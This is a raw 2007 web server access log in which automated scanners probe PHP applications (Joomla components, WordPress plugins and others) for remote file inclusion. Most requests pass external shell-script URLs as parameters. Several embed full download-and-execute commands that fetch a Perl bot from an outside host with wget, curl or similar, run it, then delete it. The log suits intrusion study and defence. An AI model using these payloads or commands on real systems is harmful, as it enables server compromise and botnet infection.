209.250.234.250 - - [08/Jul/2007:17:05:16 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://geocities.com/kaka_mandor/hajar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.250.234.250 - - [08/Jul/2007:17:05:16 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://geocities.com/kaka_mandor/hajar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
62.75.193.81 - - [08/Jul/2007:17:07:35 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.thiaguinho.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.81 - - [08/Jul/2007:17:07:35 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.thiaguinho.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
205.234.163.207 - - [08/Jul/2007:17:07:51 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.thiaguinho.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.163.207 - - [08/Jul/2007:17:07:51 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.thiaguinho.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.60.35 - - [08/Jul/2007:17:09:26 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://opti-kreateur.re/UserFiles/pas.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.9.66 - - [08/Jul/2007:17:12:54 -0700] "GET /logs/index.php?go=http://www.mulepack.net/images/_vti_cnf/vw_inactive_usr_.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.9.66 - - [08/Jul/2007:17:12:54 -0700] "GET /logs/index.php?go=http://www.mulepack.net/images/_vti_cnf/s.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.9.66 - - [08/Jul/2007:17:12:55 -0700] "GET /index.php?go=http://www.mulepack.net/images/_vti_cnf/vw_inactive_usr_.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.9.66 - - [08/Jul/2007:17:12:55 -0700] "GET /index.php?go=http://www.mulepack.net/images/_vti_cnf/s.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.234.242 - - [08/Jul/2007:17:15:33 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://opti-kreateur.re/UserFiles/pas.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.75.193.81 - - [08/Jul/2007:17:16:46 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.thiaguinho.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.246.112.44 - - [08/Jul/2007:17:18:16 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hosted.3000mb.com/page05.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.246.112.44 - - [08/Jul/2007:17:18:16 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hosted.3000mb.com/smile07.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.246.112.44 - - [08/Jul/2007:17:18:16 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hosted.3000mb.com/page05.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.246.112.44 - - [08/Jul/2007:17:18:17 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hosted.3000mb.com/smile07.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.72.117.166 - - [08/Jul/2007:17:20:49 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://opti-kreateur.re/UserFiles/pas.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.67.42.18 - - [08/Jul/2007:17:30:06 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.67.42.18 - - [08/Jul/2007:17:30:10 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:17:36:52 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:17:36:56 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:17:37:02 -0700] "GET /logs/index.php?file=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:17:37:02 -0700] "GET /index.php?file=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.42.210.102 - - [08/Jul/2007:17:39:35 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://2msdance.com/language/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.42.210.102 - - [08/Jul/2007:17:39:35 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://2msdance.com/language/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
147.202.66.106 - - [08/Jul/2007:17:43:42 -0700] "GET /logs/admin/i/editor2/spaw_control.class.php?spaw_root=http://www.freewebs.com/rootlab/r.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
147.202.66.106 - - [08/Jul/2007:17:43:42 -0700] "GET /admin/i/editor2/spaw_control.class.php?spaw_root=http://www.freewebs.com/rootlab/r.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.49 - - [08/Jul/2007:17:50:57 -0700] "GET /logs/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.attacks.xpg.com.br/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.49 - - [08/Jul/2007:17:50:57 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.attacks.xpg.com.br/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.67.42.18 - - [08/Jul/2007:17:51:46 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.67.42.18 - - [08/Jul/2007:17:51:47 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.53.9.66 - - [08/Jul/2007:17:56:08 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mulepack.net/images/_vti_cnf/vw_inactive_usr_.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.9.66 - - [08/Jul/2007:17:56:08 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mulepack.net/images/_vti_cnf/s.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
74.53.9.66 - - [08/Jul/2007:17:56:09 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mulepack.net/images/_vti_cnf/vw_inactive_usr_.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
74.53.9.66 - - [08/Jul/2007:17:56:09 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mulepack.net/images/_vti_cnf/s.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.19.29 - - [08/Jul/2007:18:02:11 -0700] "GET /logs/access_061225.log HTTP/1.0" 200 155131 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.239.175.58 - - [08/Jul/2007:18:05:48 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://lott.by/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.67.42.18 - - [08/Jul/2007:18:15:42 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.67.42.18 - - [08/Jul/2007:18:15:43 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.171.127.102 - - [08/Jul/2007:18:17:01 -0700] "GET /index2.php?x=http://disqad.za.pl/phpshell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.127.102 - - [08/Jul/2007:18:17:02 -0700] "GET /index2.php?x=http://disqad.za.pl/cmd.txt?&cmd=cd+/tmp;GET+http://yourlinkforyourbothere.pl/bot.txt+%3E%3E+xbot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.127.102 - - [08/Jul/2007:18:17:02 -0700] "GET /index2.php?x=http://disqad.za.pl/cmd.txt?&cmd=cd+/tmp;wget+http://yourlinkforyourbothere.pl/bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.127.102 - - [08/Jul/2007:18:17:02 -0700] "GET /index2.php?x=http://disqad.za.pl/cmd.txt?&cmd=cd+/tmp;fetch%20http://yourlinkforyourbothere.pl/bot.txt+%3E%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.127.102 - - [08/Jul/2007:18:17:03 -0700] "GET /index2.php?x=http://disqad.za.pl/cmd.txt?&cmd=cd+/tmp;curl+http://yourlinkforyourbothere.pl/bot.txt+-o+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.127.102 - - [08/Jul/2007:18:17:03 -0700] "GET /index2.php?x=http://disqad.za.pl/cmd.txt?&cmd=cd+/tmp;lynx+-source+http://yourlinkforyourbothere.pl/bot.txt+%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.127.102 - - [08/Jul/2007:18:17:03 -0700] "GET /index2.php?x=http://disqad.za.pl/phpshell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:18:31:54 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
64.61.91.106 - - [08/Jul/2007:18:31:55 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.67.42.18 - - [08/Jul/2007:18:32:01 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
201.67.42.18 - - [08/Jul/2007:18:32:02 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
147.202.66.106 - - [08/Jul/2007:18:37:17 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.freewebs.com/rootlab/r.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
147.202.66.106 - - [08/Jul/2007:18:37:17 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.freewebs.com/rootlab/r.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.21.44 - - [08/Jul/2007:18:43:22 -0700] "GET /logs/ HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.165.173.5 - - [08/Jul/2007:18:43:43 -0700] "GET /logs/index.php?go=http://shinchi.by.ru/cmd.txt?&cmd=cd%20tmp;lwp-download%20http://scan.prohosts.org/chibot.txt;perl%20chibot.txt;perl%20chibot.txt;rm%20-rf%20chibot*? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.165.173.5 - - [08/Jul/2007:18:43:43 -0700] "GET /index.php?go=http://shinchi.by.ru/cmd.txt?&cmd=cd%20tmp;lwp-download%20http://scan.prohosts.org/chibot.txt;perl%20chibot.txt;perl%20chibot.txt;rm%20-rf%20chibot*? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.165.173.5 - - [08/Jul/2007:18:43:48 -0700] "GET /logs/index.php?go=http://shinchi.by.ru/sb? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.165.173.5 - - [08/Jul/2007:18:43:49 -0700] "GET /index.php?go=http://shinchi.by.ru/sb? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.9.66 - - [08/Jul/2007:18:45:58 -0700] "GET /logs/index.php?file=http://www.mulepack.net/images/_vti_cnf/vw_inactive_usr_.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.9.66 - - [08/Jul/2007:18:45:58 -0700] "GET /logs/index.php?file=http://www.mulepack.net/images/_vti_cnf/s.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.9.66 - - [08/Jul/2007:18:45:59 -0700] "GET /index.php?file=http://www.mulepack.net/images/_vti_cnf/vw_inactive_usr_.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.9.66 - - [08/Jul/2007:18:45:59 -0700] "GET /index.php?file=http://www.mulepack.net/images/_vti_cnf/s.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.70.4.35 - - [08/Jul/2007:18:47:49 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com/search?q=%22index+of%22+lesbiana&btnG=Search&num=100&hl=en&safe=off" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51" "www.galf.org"
75.70.4.35 - - [08/Jul/2007:18:47:49 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51" "www.galf.org"
75.70.4.35 - - [08/Jul/2007:18:47:50 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51" "www.galf.org"
85.25.146.145 - - [08/Jul/2007:18:57:36 -0700] "GET /index.php?p=http://gsblab.net/bot/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
147.202.66.106 - - [08/Jul/2007:18:58:15 -0700] "GET /logs/access.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.freewebs.com/rootlab/r.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:18:58:22 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:18:58:23 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.88.74.247 - - [08/Jul/2007:18:59:53 -0700] "GET / HTTP/1.1" 200 1048 "http://www.lesbianas.tv/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.galf.org"
200.88.74.247 - - [08/Jul/2007:18:59:54 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.galf.org"
87.89.227.61 - - [08/Jul/2007:19:00:31 -0700] "GET /logs/access_070707.log HTTP/1.0" 404 275 "-" "Wget/1.10.2" "galf.org"
69.50.136.72 - - [08/Jul/2007:19:01:05 -0700] "GET /index.php?go=http://suntikan.org/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:19:03:49 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:19:03:50 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.67.42.18 - - [08/Jul/2007:19:09:25 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.67.42.18 - - [08/Jul/2007:19:09:26 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.197.155 - - [08/Jul/2007:19:10:49 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://geocities.com/kaka_mandor/hajar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.197.155 - - [08/Jul/2007:19:10:49 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://geocities.com/kaka_mandor/hajar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.0.124 - - [08/Jul/2007:19:14:27 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:19:15:56 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:19:15:57 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.135.37.237 - - [08/Jul/2007:19:17:53 -0700] "GET /index.php?go=http://opti-kreateur.re/UserFiles/pas.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.37.237 - - [08/Jul/2007:19:19:55 -0700] "GET /index.php?go=http://opti-kreateur.re/UserFiles/pas.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.37.237 - - [08/Jul/2007:19:20:06 -0700] "GET /index.php?go=http://opti-kreateur.re/UserFiles/pas.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.150.197.144 - - [08/Jul/2007:19:21:25 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedyspider/)" "www.galf.org"
89.150.197.144 - - [08/Jul/2007:19:21:28 -0700] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedyspider/)" "www.galf.org"
85.25.146.145 - - [08/Jul/2007:19:22:36 -0700] "GET /index.php?file=http://gsblab.net/bot/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:19:25:36 -0700] "GET /logs/index.php?go=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:19:25:36 -0700] "GET /index.php?go=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.127.102 - - [08/Jul/2007:19:26:19 -0700] "GET /index2.php?url_page=http://disqad.za.pl/phpshell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.127.102 - - [08/Jul/2007:19:26:19 -0700] "GET /index2.php?url_page=http://disqad.za.pl/cmd.txt?&cmd=cd+/tmp;GET+http://yourlinkforyourbothere.pl/bot.txt+%3E%3E+xbot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.127.102 - - [08/Jul/2007:19:26:20 -0700] "GET /index2.php?url_page=http://disqad.za.pl/cmd.txt?&cmd=cd+/tmp;wget+http://yourlinkforyourbothere.pl/bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.127.102 - - [08/Jul/2007:19:26:20 -0700] "GET /index2.php?url_page=http://disqad.za.pl/cmd.txt?&cmd=cd+/tmp;fetch%20http://yourlinkforyourbothere.pl/bot.txt+%3E%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.127.102 - - [08/Jul/2007:19:26:20 -0700] "GET /index2.php?url_page=http://disqad.za.pl/cmd.txt?&cmd=cd+/tmp;curl+http://yourlinkforyourbothere.pl/bot.txt+-o+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.127.102 - - [08/Jul/2007:19:26:21 -0700] "GET /index2.php?url_page=http://disqad.za.pl/cmd.txt?&cmd=cd+/tmp;lynx+-source+http://yourlinkforyourbothere.pl/bot.txt+%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.171.127.102 - - [08/Jul/2007:19:26:21 -0700] "GET /index2.php?url_page=http://disqad.za.pl/phpshell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.19.79 - - [08/Jul/2007:19:27:27 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.24.101 - - [08/Jul/2007:19:27:31 -0700] "GET /logs/?D=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:19:29:41 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:19:29:42 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.27.23 - - [08/Jul/2007:19:30:13 -0700] "GET /logs/access_070709.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:19:35:16 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:19:35:16 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.33.62.214 - - [08/Jul/2007:19:35:21 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.swindon-heartstart-group.org.uk/usage/dns.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.33.62.214 - - [08/Jul/2007:19:35:21 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.swindon-heartstart-group.org.uk/usage/dns.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:19:38:31 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.61.91.106 - - [08/Jul/2007:19:38:32 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.62.66.130 - - [08/Jul/2007:19:41:13 -0700] "GET /logs/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://tatabr.prohosts.org/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.62.66.130 - - [08/Jul/2007:19:41:13 -0700] "GET /mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://tatabr.prohosts.org/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.30.91.75 - - [08/Jul/2007:19:41:51 -0700] "GET /logs/access.log HTTP/1.0" 200 22896 "http://distancelearningin.com" "-" "www.galf.org"
217.109.160.77 - - [08/Jul/2007:19:50:11 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://opti-kreateur.re/UserFiles/pas.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.109.160.77 - - [08/Jul/2007:19:50:23 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://opti-kreateur.re/UserFiles/pas.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.17.100 - - [08/Jul/2007:20:01:42 -0700] "GET /labia/?S=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:20:03:01 -0700] "GET /logs/index2.php?content=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [08/Jul/2007:20:03:01 -0700] "GET /index2.php?content=http://www.ricksa.xpgplus.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.23.207 - - [08/Jul/2007:20:05:59 -0700] "GET /logs/access_061225.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
201.67.42.18 - - [08/Jul/2007:20:06:57 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.67.42.18 - - [08/Jul/2007:20:06:58 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.67.42.18 - - [08/Jul/2007:20:07:34 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.67.42.18 - - [08/Jul/2007:20:07:34 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bandwith.netfast.org/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
